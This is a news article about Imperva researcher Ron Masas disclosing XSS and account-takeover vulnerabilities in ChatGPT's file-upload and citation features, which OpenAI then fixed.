Israeli research reveals ChatGPT weak spots, saves millions from being hacked

Exclusive: Vulnerabilities revealed by Israeli researcher could have affected millions of users of the world's most popular AI service, allowing attackers to gain full access to any account on the AI platform; The OpenAI company took care of it and now there is no such danger

The research group of the Israeli-American cyber company Imperva revealed on Monday a series of security vulnerabilities in the popular AI chatbot ChatGPT. According to the researchers, these vulnerabilities could have allowed hackers to take over user accounts without the need for login information. This is a severe problem that could have revealed a lot of personal information due to the diverse tasks undertaken by the chatbot and the fact that it saves conversation histories.
<< Follow Ynetnews on Facebook | Twitter | Instagram | TikTok >>
Read more:
ChatGPT currently has about 180 million registered users, so the breach could have affected millions of users worldwide and allowed hackers to gain full access to every account on the platform. The vulnerabilities could have been exploited through ChatGPT's file upload mechanism and its citation function from those files.
Additionally, another XSS vulnerability was found that originated in the way ChatGPT cites websites; that is, its ability to read websites. This allowed the company's researchers to run malicious code on the AI platform by embedding it in a malicious website.
2 View gallery
בינה מלאכותית
בינה מלאכותית
AI can be of service or contain malicious content
(Photo generated by DALL-E3)
A successful hack is one after which any action can be ordered within the accounts, including actions such as deleting, creating and updating data, and even accessing it. These vulnerabilities were reported to OpenAI and quickly fixed.
Ron Masas, a security researcher at Imperva, identified the vulnerabilities, and explained that these are problems that exist in many websites and online services. "The idea is to allow the browser to take advantage of the login token and the identification of the connected user," he explains. A token is a code used by the browser to identify itself with the service to which it is connected, like an identity card. It includes the login details and allows the service to confirm that they are correct.
"My investigation began with an examination of ChatGPT's file uploading mechanism and its citation functionality from those files. By uploading a malicious file and exploiting additional weaknesses, I was able to create a conversation with ChatGPT that could be shared and allowed full control of any account that accessed it," Masas explained.
2 View gallery
רון מסאס חוקר חולשות אימפרבה
רון מסאס חוקר חולשות אימפרבה
Ron Masas, security researcher for Imperva
(Photo: Private)
These are not the first security issues to be discovered in ChatGPT. The chatbot was disabled after hackers broke in to OpenAI's system in May. A more recent report found that hacking groups are taking advantage of the service's code-writing capabilities to test for vulnerabilities and improve the performance of their malicious code. There are also malicious agents who use the service to spread pro-Palestinian propaganda online.
Breaches and weaknesses are common in new platforms. Sometimes it takes a long time for the developers to block them all. However, this is a serious problem that continues to trouble the industry. At the same, it's hard to ignore that ChatGPT developers didn't just try running their site's code on it so it would detect the vulnerabilities in the platform itself.
Comments
The commenter agrees to the privacy policy of Ynet News and agrees not to submit comments that violate the terms of use, including incitement, libel and expressions that exceed the accepted norms of freedom of speech.
""